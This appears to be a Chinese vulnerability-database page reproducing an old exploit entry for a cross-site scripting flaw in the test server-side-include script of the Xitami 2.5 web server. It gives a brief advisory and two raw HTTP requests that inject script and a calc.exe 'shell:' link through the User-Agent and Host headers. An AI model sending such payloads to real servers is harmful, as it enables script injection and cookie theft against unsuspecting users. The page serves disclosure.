Imatix Xitami 2.5 – Server-Side Includes Cross-Site Scripting

22次阅读
没有评论

Imatix Xitami 2.5 – Server-Side Includes Cross-Site Scripting

漏洞ID 1054536 漏洞类型
发布时间 2004-07-22 更新时间 2004-07-22
Imatix Xitami 2.5 - Server-Side Includes Cross-Site ScriptingCVE编号 N/A
Imatix Xitami 2.5 - Server-Side Includes Cross-Site ScriptingCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24304
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10778/info

It is reported that Imatix Xitami is affected by a cross-site scripting vulnerability in the server side includes test script. This issue is due to a failure of the application to properly sanitize user-supplied input.

Successful exploitation of this issue will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user. This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

Telnet (dont netcat!) to port 80:

GET /testssi.ssi HTTP/1.1
Host: localhost
User-Agent: <A HREF="shell:windowssystem32calc.exe">PLEASE CLICK HERE</A>
Connection: close

GET /testssi.ssi HTTP/1.1
Host: <script>alert("Please click at "PLEASE CLICK HERE"")</script>
User-Agent: <A HREF="shell:windowssystem32calc.exe">PLEASE CLICK HERE</A>
Connection: close

相关推荐: PunBB Profile.PHP Cross-Site Scripting Vulnerability

PunBB Profile.PHP Cross-Site Scripting Vulnerability 漏洞ID 1098467 漏洞类型 Input Validation Error 发布时间 2004-04-24 更新时间 2004-04-24 CVE编…

正文完
 0